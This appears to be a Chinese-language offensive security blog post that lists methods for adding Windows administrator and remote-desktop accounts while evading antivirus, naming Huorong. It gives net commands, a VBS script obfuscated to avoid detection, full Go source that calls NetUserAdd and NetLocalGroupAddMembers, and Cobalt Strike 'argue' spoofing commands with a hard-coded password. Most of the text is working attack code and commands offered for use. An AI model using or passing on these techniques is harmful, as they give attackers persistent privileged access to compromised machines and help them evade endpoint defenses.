简单测试多种方式绕过杀软添加用户

方法1、激活GUEST用户

这个不用多说，大家都会，还是比较好用的，试过很多次杀软都不拦截
net user guest /active:yes
net user guest Aa123456.
net localgroup administrators guest /add
net localgroup “Remote Desktop Users” guest /add

方法2、net1绕过

net1.exe在C:/windows/system32下

进入到目录下面，此时生成一个asd.txt

此时的asd.txt就和net 一样了，可以执行net user

不会触发火绒告警（有的主机会有的主机不会不知道为啥）

方法3、VBS API脚本

wscript.exe add.vbs 无法绕过火绒（会被当做adduser病毒干掉）

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","iiice")
od.SetPassword "123456"
od.SetInfo
Set of=GetObject(os&"/iiice",user)
oe.add os&"/admin"

但是我们只要简单的尝试混淆即可绕过

Set wsnetwork=CreateObject("WS"&"CR"&"IPT"&"."&"NET"&"WO"&"RK") 
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","iiice")
Const strPassword = "123456"
od.SetPassword strPassword
od.SetInfo
Set of=GetObject(os&"/iiice",user)
oe.add os&"/iiice"

方法4、使用windows底层API

原理是使用windows本地的netapi32.dll来绕过杀软的监测

package main
import (
    "fmt"
    "os"
    "syscall"
    "unsafe"
)
//参考如下
//https://docs.microsoft.com/zh-cn/windows/win32/api/lmaccess/nf-lmaccess-netuseradd/
//https://github.com/CodyGuo/xcgui/blob/master/doc/cToGo.go
//https://github.com/iamacarpet/go-win64api/blob/master/users.go
//https://git.itch.ovh/itchio/ox/-/blob/ec75be15423d72ab9691a3318ecce3feee67b19b/syscallex/netapi32_windows.go
//https://pkg.go.dev/github.com/itchio/ox/syscallex#NetUserAdd
type USER_INFO_1 struct {
    Usri1_name         *uint16
    Usri1_password     *uint16
    Usri1_password_age uint32 //可忽略
    Usri1_priv         uint32
    Usri1_home_dir     *uint16
    Usri1_comment      *uint16
    Usri1_flags        uint32
    Usri1_script_path  *uint16
}
type LOCALGROUP_MEMBERS_INFO_3 struct {
    Lgrmi3_domainandname *uint16
}
const (
    USER_PRIV_GUEST            = 0
    USER_PRIV_USER             = 1
    USER_PRIV_ADMIN            = 2
    USER_UF_SCRIPT             = 1
    USER_UF_NORMAL_ACCOUNT     = 512
    USER_UF_DONT_EXPIRE_PASSWD = 65536
    //parmErr                     = 0
    NET_API_STATUS_NERR_Success = 0
)
type User struct {
    username string
    password string
}
func main() {
    // 请更改此处用户名密码
    info := User{
        username: "test",
        password: "123456",
    }
    r, err := NetUserAdd(info.username, info.password)
    if err != nil {
        fmt.Println(err)
    }
    fmt.Println(r)
    //if r == true {
    //  _, err := AddLocalGroup("test", "Administrators")
    //  if err != nil {
    //      fmt.Println(err)
    //  }
    //}
}
func NetUserAdd(user string, pass string) (bool, error) {
    var parmErr uint32
    parmErr = uint32(0)
    username := UtfToStr(user)
    password := UtfToStr(pass)
    userinfo := USER_INFO_1{
        Usri1_name:     username,
        Usri1_password: password,
        Usri1_priv:     USER_PRIV_USER,
        Usri1_flags:    USER_UF_SCRIPT | USER_UF_NORMAL_ACCOUNT | USER_UF_DONT_EXPIRE_PASSWD,
        //Usri1_home_dir:    UtfToStr(""),
        //Usri1_comment:     UtfToStr("test测试用户"),
        //Usri1_script_path: UtfToStr(""),
    }
    netapi, err := syscall.LoadLibrary("netapi32.dll")
    if err != nil {
        panic("dll引用失败")
    }
    AddUser, err := syscall.GetProcAddress(netapi, "NetUserAdd")
    result, _, _ := syscall.Syscall6(AddUser,
        4,
        uintptr(0),         //server
        uintptr(uint32(1)), //lever
        uintptr(unsafe.Pointer(&userinfo)),
        uintptr(unsafe.Pointer(&parmErr)), 0, 0,
    )
    //令必须使用管理员权限才能添加用户
    if result != NET_API_STATUS_NERR_Success {
        return false, fmt.Errorf("添加失败")
    } else {
        _, err = AddLocalGroup(user, "Administrators", netapi)
        if err != nil {
            fmt.Println(err)
        }
        return true, fmt.Errorf("添加成功%s:%s", user, pass)
    }
}
func AddLocalGroup(user, group string, netapi syscall.Handle) (bool, error) {
    work, _ := os.Hostname()
    WorkStation := UtfToStr(work + `\` + user)
    GroupName := UtfToStr(group)
    var uArray = make([]LOCALGROUP_MEMBERS_INFO_3, 1)
    uArray[0] = LOCALGROUP_MEMBERS_INFO_3{
        Lgrmi3_domainandname: WorkStation,
    }
    ALG, _ := syscall.GetProcAddress(netapi, "NetLocalGroupAddMembers")
    result, _, _ := syscall.Syscall6(ALG, 5,
        uintptr(0),                          // servername
        uintptr(unsafe.Pointer(GroupName)),  // group name
        uintptr(uint32(3)),                  // level
        uintptr(unsafe.Pointer(&uArray[0])), // user array.
        uintptr(uint32(len(uArray))), 0)
    if result != NET_API_STATUS_NERR_Success {
        return false, fmt.Errorf("添加管理组失败")
    } else {
        return true, fmt.Errorf("添加管理组Administrators成功")
    }
}
func UtfToStr(str string) *uint16 {
    res, err := syscall.UTF16PtrFromString(str)
    if err != nil {
        panic(err)
    }
    return res
}

或者有github开源的项目可以尝试
https://github.com/newsoft/adduser

方法5、利用CS argue参数欺骗

beacon> argue net1 /bypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypass
beacon> run net1 user betasec 3had0w!@#123 /add 
beacon> run net1 localgroup administrators betasec /add
argue 进程参数欺骗
argue [command] [fake arguments]
argue 命令 假参数 欺骗某个命令参数
argue [command]
argue 命令 取消欺骗某个命令参数

方法6、使用Shellcode底层代码点击EXE触发添加用户的操作（比API更底层）

目前还没有这方面的基础
https://wizardforcel.gitbooks.io/q-buffer-overflow-tutorial/content/35.html

方法7、一个项目

https://github.com/scareing/cmd2shellcode